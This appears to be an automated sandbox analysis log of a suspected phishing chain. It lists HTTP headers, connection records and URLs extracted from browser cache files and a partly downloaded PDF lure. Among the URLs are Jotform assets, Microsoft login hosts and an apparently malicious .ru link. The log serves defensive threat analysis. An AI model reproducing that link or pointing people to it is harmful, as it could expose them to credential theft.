Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 12:36:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NTy5FmInOhUR88Lwrok3kwnPNKIH1pnWwJpPUp1Hwt3iZqhpMbqVtdAdlgfYyuBVugBTlSiEpQnm8tehb8Y6AgK8NKLJUbNdWCkk0rO%2FaR2A%2B6%2FJ63gdvNQpauEc8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3978&min_rtt=3930&rtt_var=1190&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2232&delivery_rate=684450&cwnd=251&unsent_bytes=0&cid=c0e1fc07c17549cc&ts=150&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8ffcb6b25cf972a4-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1999&min_rtt=1990&rtt_var=765&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1898&delivery_rate=1412675&cwnd=212&unsent_bytes=0&cid=2a05a259cc438393&ts=3808&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 12:36:38 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: kkn30H+zMfoTfkPEUTJi2w==$Rp+rfy+e49VAq1MCZvQxEg==Server: cloudflareCF-RAY: 8ffcb6bc788c4285-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 12:36:41 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: U7+sYpqlajgR/yKITxV9sA==$FrnGghf1uwzJWHnjTzj3jw==Server: cloudflareCF-RAY: 8ffcb6d15b0842ac-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 12:36:44 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: EpA8KaEMkzmIv1yhMX86nA==$MlaxgomoUUwEw3tZx2UlvA==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8ffcb6e4ae084319-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 12:37:57 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: nNYJCBsTUOw31e0Um4lO1g==$81RCqf826NzOMsnbiK+RoA==Server: cloudflareCF-RAY: 8ffcb8ad6d794411-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: http://www.xfa.org/schema/xci/
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: http://www.xfa.org/schema/xdc/
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: http://www.xfa.org/schema/xfa-connection-set/
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: http://www.xfa.org/schema/xfa-data/
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: http://www.xfa.org/schema/xfa-data/1.0/
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: http://www.xfa.org/schema/xfa-form/
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: http://www.xfa.org/schema/xfa-locale-set/
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: http://www.xfa.org/schema/xfa-source-set/
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: http://www.xfa.org/schema/xfa-template/
Source: chromecache_213.1.drString found in binary or memory: https://cdn.jotfor.ms$
Source: chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://cdn.jotfor.ms/assets/img/cardforms/feedbackButton.svg
Source: chromecache_188.1.drString found in binary or memory: https://cdn.jotfor.ms/assets/img/favicons/
Source: chromecache_188.1.drString found in binary or memory: https://cdn.jotfor.ms/assets/img/favicons/favicon-2021-light.png
Source: chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://cdn.jotfor.ms/assets/img/logo2021/jotform_portal_logo_icon400x400-dark.png
Source: chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://cdn.jotfor.ms/assets/img/portal/mobileViewDefaultBgB21.png
Source: chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://cdn.jotfor.ms/assets/img/portal/pickerItemDefaultB21.png
Source: chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://cdn.jotfor.ms/assets/img/portal/pickerItemFallbackImg.png
Source: chromecache_188.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/?family=Circular:400:500:700
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Black.woff)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Black.woff2)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BlackItalic.woff)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BlackItalic.woff2)
Source: chromecache_239.1.dr, chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Bold.woff)
Source: chromecache_188.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Bold.woff2
Source: chromecache_239.1.dr, chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Bold.woff2)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BoldItalic.woff)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BoldItalic.woff2)
Source: chromecache_239.1.dr, chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff)
Source: chromecache_188.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff2
Source: chromecache_239.1.dr, chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff2)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BookItalic.woff)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-BookItalic.woff2)
Source: chromecache_239.1.dr, chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Italic.woff)
Source: chromecache_239.1.dr, chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Italic.woff2)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Light.woff)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Light.woff2)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-LightItalic.woff)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-LightItalic.woff2)
Source: chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Medium.woff
Source: chromecache_239.1.dr, chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Medium.woff)
Source: chromecache_188.1.dr, chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Medium.woff2
Source: chromecache_239.1.dr, chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Medium.woff2)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-MediumItalic.woff)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-MediumItalic.woff2)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Thin.woff)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Thin.woff2)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-ThinItalic.woff)
Source: chromecache_275.1.drString found in binary or memory: https://cdn.jotfor.ms/fonts/circular/fonts/Circular-ThinItalic.woff2)
Source: chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://cdn.jotfor.ms/resources/assets/icon/min/jotform-icon-orange-400x400.png
Source: chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://cdn.jotfor.ms/resources/assets/icon/min/jotform-logomark-white-400x400.png
Source: chromecache_188.1.drString found in binary or memory: https://cdn.jotfor.ms/stylebuilder/static/donationBox.css?v=3ff9d3e
Source: chromecache_188.1.drString found in binary or memory: https://cdn01.jotfor.ms/s/portal/674ac14411e/static/css/8953.c2dbea13.css
Source: chromecache_188.1.drString found in binary or memory: https://cdn01.jotfor.ms/s/portal/674ac14411e/static/js/8953.7f4b13b0.js
Source: chromecache_188.1.drString found in binary or memory: https://cdn01.jotfor.ms/s/umd/674ac14411e/for-csa-timeout.js
Source: chromecache_273.1.drString found in binary or memory: https://cdn01.jotfor.ms/s/umd/674ac14411e/for-push-notification.js
Source: chromecache_188.1.drString found in binary or memory: https://cdn01.jotfor.ms/s/vendor/static
Source: chromecache_188.1.drString found in binary or memory: https://cdn01.jotfor.ms/s/vendor/static/moment/2.29.4/moment-with-locales.min.js
Source: chromecache_188.1.drString found in binary or memory: https://cdn02.jotfor.ms
Source: chromecache_188.1.drString found in binary or memory: https://cdn02.jotfor.ms/s/portal/674ac14411e/static/css/index.5048e680.css
Source: chromecache_188.1.drString found in binary or memory: https://cdn02.jotfor.ms/s/portal/674ac14411e/static/js/index.f047cc75.js
Source: chromecache_188.1.drString found in binary or memory: https://cdn02.jotfor.ms/s/vendor/static/moment-timezone/0.5.43/moment-timezone-with-data.min.js
Source: chromecache_188.1.drString found in binary or memory: https://cdn02.jotfor.ms/s/vendor/static/pwacompat/2.0.11/pwacompat.min.js
Source: chromecache_188.1.drString found in binary or memory: https://cdn03.jotfor.ms/s/portal/674ac14411e
Source: chromecache_188.1.drString found in binary or memory: https://cdn03.jotfor.ms/s/portal/674ac14411e/static/css/jotform.css.e448a675.css
Source: chromecache_188.1.drString found in binary or memory: https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/jotform.css.a4a80bcb.js
Source: chromecache_199.1.dr, chromecache_217.1.dr, chromecache_212.1.dr, d748e2e7-fd2f-4c10-9378-9ee3b269a691.tmp.0.dr, DOWNLOAD GITTENS MURRAYS ARCHITECTS.678101120618b4.41192529.pdf.crdownload.0.drString found in binary or memory: https://dm9h.zomivane.ru/oIZnEw3n/)
Source: chromecache_188.1.drString found in binary or memory: https://eu.jotform.com
Source: chromecache_188.1.drString found in binary or memory: https://eu.jotform.com/app/250092704521347
Source: chromecache_188.1.drString found in binary or memory: https://eu.jotform.com/app/250092704521347/og-image.png?time=1736507717
Source: chromecache_188.1.drString found in binary or memory: https://eu.jotform.com/uploads/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.p
Source: chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://github.com/floating-ui/react-popper/issues/364
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: https://github.com/zloirock/core-js
Source: chromecache_200.1.dr, chromecache_251.1.drString found in binary or memory: https://github.com/zloirock/core-js/blob/v3.22.3/LICENSE
Source: chromecache_206.1.dr, chromecache_184.1.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_206.1.dr, chromecache_184.1.drString found in binary or memory: https://login.windows-ppe.net
Source: chromecache_199.1.dr, chromecache_217.1.dr, chromecache_212.1.dr, d748e2e7-fd2f-4c10-9378-9ee3b269a691.tmp.0.dr, DOWNLOAD GITTENS MURRAYS ARCHITECTS.678101120618b4.41192529.pdf.crdownload.0.drString found in binary or memory: https://southcentralusr-notifyp.svc.ms/api/v2/tracking/method/Click?mi=QqZI7lAkKE-xAVeF-uoYeg&ru=htt
Source: chromecache_188.1.drString found in binary or memory: https://www.jotform.com
Source: chromecache_201.1.dr, chromecache_213.1.drString found in binary or memory: https://www.jotform.com/help/469-how-to-integrate-bluesnap-with-jotform/#authorizedBluesnap
Source: chromecache_188.1.drString found in binary or memory: https://www.jotform.com/oembed/?format=json&url=https%3A%2F%2Fwww.jotform.com%2Fapp%2F25009270452134
Source: chromecache_188.1.drString found in binary or memory: https://www.jotform.com/oembed/?format=xml&url=https%3A%2F%2Fwww.jotform.com%2Fapp%2F250092704521347
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
